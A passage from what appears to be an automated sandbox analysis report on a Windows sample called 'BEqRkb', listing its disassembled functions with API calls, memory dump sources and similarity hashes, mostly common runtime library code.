                                                                                        • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                        • Instruction ID: dfa8a47e8e8d099b9f3685c968c8f572eaa1b06f84ebfce588191cde8389bf3a
                                                                                        • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                        • Instruction Fuzzy Hash: C9B1A1A5B0EE4281EA65DB53D04023D6BA2AF56FA4F0994F7DA5D077A6DF2CE4818300
                                                                                        Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInfoSleepStartupType
                                                                                        • String ID:
                                                                                        • API String ID: 1527402494-0
                                                                                        • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                        • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                                                        • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                        • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                                                        Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 3078728599-0
                                                                                        • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                        • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                                                        • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                        • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                                                        Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                        • String ID:
                                                                                        • API String ID: 1850339568-0
                                                                                        • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                        • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                                                        • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                        • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                                                        Function 00007FFE1A51FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: _set_statfp
                                                                                        • String ID:
                                                                                        • API String ID: 1156100317-0
                                                                                        • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                        • Instruction ID: 4c66fb6570d3b2361dc4d94958eeff089919dbb898f476bea13e0e95e66983e9
                                                                                        • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                        • Instruction Fuzzy Hash: 54119476F1CE0B41F754116AE5F637912436FABBB4F1446F7E5AE063FA8E2CA8484101
                                                                                        Function 00007FFE1A519684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196A3
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196C2
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196EA
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A5196FB
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A51766F,?,?,00000000,00007FFE1A51790A,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A51970C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID:
                                                                                        • API String ID: 3702945584-0
                                                                                        • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                                        • Instruction ID: bec66f72274ef4cde7cc6df405f19775c8c2e263caf48d2b5596f8c1e90a6592
                                                                                        • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                                        • Instruction Fuzzy Hash: 5E115E24F0CA4289FA58A727659117961A39F47FF0F5443F7E83E866F6EE2CF4418200
                                                                                        Function 00007FFE1A519518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID:
                                                                                        • API String ID: 3702945584-0
                                                                                        • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                                        • Instruction ID: 78ad703d96acf2ff8486db924497f0dce39870cd7231b4f618812a97da081c60
                                                                                        • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                                        • Instruction Fuzzy Hash: 6B115A54F0CA038AFA68A663549117921A34F53F74F5507F7D83E9A6F2ED2CB4418200
                                                                                        Function 00007FFE1A515448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 3544855599-2084237596
                                                                                        • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                                        • Instruction ID: 9ea521ba9b9547fd75e1f6027c28664a4c332a7af49d2ff03a5552e07416e182
                                                                                        • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                                        • Instruction Fuzzy Hash: 43919F73B08B818AE750CB76D4802BD7BA1FB46BA8F1441BAEA4D17B65DF38D195C700
                                                                                        Function 00007FFE1A513A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 2395640692-1018135373
                                                                                        • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                                        • Instruction ID: 0962f6c1ff0f3b1346b15cdc3083d10c5537d059addc9f16929a96a363b2ed98
                                                                                        • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                                        • Instruction Fuzzy Hash: 9551B331B1DA428ADB94CB16D464A787392EB45FB8F1081F2DA4E477A6EF7DE841C700
                                                                                        Function 00007FFE1A5159C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 3896166516-3733052814
                                                                                        • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                                        • Instruction ID: 83fc2d36671c7e545f831268309094aa13c79419e7f65d97d557f28b084cb995
                                                                                        • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                                        • Instruction Fuzzy Hash: 7D51933270CB428ADB648B22949437877A2EB56FA9F1841F7DA5D477A5CF3CE451C700
                                                                                        Function 00007FFE1A5151D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 3544855599-2084237596
                                                                                        • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                                        • Instruction ID: 8796d5cdbdf9be1d799c6108bc7b00a0a488b1119c77dfeb77f6c4f438cb440b
                                                                                        • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                                        • Instruction Fuzzy Hash: 00618472A0CBC581D7608B26E4403BAB7A1FB85BA8F4442B6EB9D07765DF7CD190CB00
                                                                                        Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleLoadModuleProc
                                                                                        • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                        • API String ID: 3055805555-3733552308
                                                                                        • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                        • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                                                        • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                        • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                                                        Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentSizeWorking
                                                                                        • String ID: Shrinking process size
                                                                                        • API String ID: 2122760700-652428428
                                                                                        • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                        • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                                                        • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                        • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                                                        Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                        • String ID:
                                                                                        • API String ID: 2801635615-0
                                                                                        • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                        • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                                                        • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                        • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                                                        Function 00007FFE1A51E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                        • String ID:
                                                                                        • API String ID: 2718003287-0
                                                                                        • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                        • Instruction ID: c3bdf5fc096c64068d07cd8c26a0ffa865e01ceaee71b160340412b538af1c01
                                                                                        • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                        • Instruction Fuzzy Hash: DDD1D072B0CA8199E711CF66D4402FC37B2FB45BA8B4442B6DE9D97BA9DE38D446C340
                                                                                        Function 00007FFE1A51ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A51ED07), ref: 00007FFE1A51EE38
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A51ED07), ref: 00007FFE1A51EEC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleErrorLastMode
                                                                                        • String ID:
                                                                                        • API String ID: 953036326-0
                                                                                        • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                        • Instruction ID: 8209a21af82db85e05bf9a8d19e659e7deeeb1412c212b39ada2aaaf9940838b
                                                                                        • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                        • Instruction Fuzzy Hash: 0191B3A2F1CE5185F7509B6694806BC2BA2AB06FA8F1441FBDE0E576A4DF38D486D700
                                                                                        Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                                                        • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                                                        • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEventSection$EnterLeaveReset
                                                                                        • String ID:
                                                                                        • API String ID: 3553466030-0
                                                                                        • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                        • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                                                        • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                        • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                                                        Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEventSection$EnterLeaveReset
                                                                                        • String ID:
                                                                                        • API String ID: 3553466030-0
                                                                                        • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                        • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                                                        • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                        • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                                                        Function 00007FFE1A512218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
